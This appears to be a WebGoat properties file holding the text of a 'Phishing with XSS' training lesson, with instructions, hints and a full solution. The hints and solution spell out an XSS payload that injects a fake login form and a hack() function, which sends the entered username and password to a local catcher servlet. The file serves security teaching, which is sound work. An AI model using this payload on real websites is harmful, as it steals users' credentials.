PhishingTitle=Phishing with XSS
PhishingInstructions=This lesson is an example of how a website might support a phishing attack if there is a known XSS attack on the page<BR><BR>Below is an example of a standard search feature.<br>Using XSS and HTML insertion, your goal is to: <UL> <LI>Insert html to that requests credentials <LI>Add javascript to actually collect the credentials <LI>Post the credentials to http://localhost:8080/WebGoat/catcher?PROPERTY=yes...</UL>  to pass this lesson, the credentials must be posted to the catcher servlet.<BR>
PhishingHint1=Try adding HTML to the search field to create a fake authentication form, since the form is vulnerable to XSS.<BR> Try to make the form look official.
PhishingHint2=Try: <BR> &lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
PhishingHint3=Add functionality that can post a request, a button might work<BR><BR>After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>http://localhost:8080/WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE
PhishingHint4=Try: <BR> &lt;input type=&quot;submit&quot; name=&quot;login&quot; value=&quot;login&quot;&gt;<BR><BR>In the whole script:<BR><BR>&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
PhishingHint5=Make the button perform an action on submit, <BR>adding an onclick=\"hack()\" might work<BR>Don't forget to add the hack() javascript function<BR><BR>In the whole script:<BR><BR>&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;<BR>Also, check firebug. Does the search form need to be terminated for this to work...? (&lt;/form&gt;)
PhishingHint6=You need to create the hack() function.  This function will pull the credentials from the webpage and post them to the WebGoat catcher servlet. <BR><BR> Some useful code snippets:<UL><LI>doucument.phish.user.value - will access the user field<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post<LI>javascript string concatentation uses a \"+\" </UL><BR><BR>The entire javascript portion:<BR><BR>&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;http://localhost:8080/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;alert(&quot;Had this been a real attack... Your credentials were just stolen.\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; +  document.phish.pass.value);} &lt;/script&gt;
PhishingHint7=Complete solution for this lesson:<BR><BR>&lt;/form&gt;&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;http://localhost:8080/WebGoat/catcher?PROPERTY=yes&amp;user=&quot; + document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;;alert(&quot;Had this been a real attack... Your credentials were just stolen.\nUser Name = &quot; + document.phish.user.value + &quot;\nPassword = &quot; +  document.phish.pass.value);} &lt;/script&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
PhishingErrorGenerating=Error generating 
PhishingEndOfSearchResults=End of Search results
PhishingNoResults=No results were found.
PhishingSearchResults=Search results
PhishingResults=Results for: 
PhishingSearch2=Search
PhishingSearch1=Search: 
PhishingDialogText=This facility will search the WebGoat source.
PhishingDialogTitle=WebGoat Search 

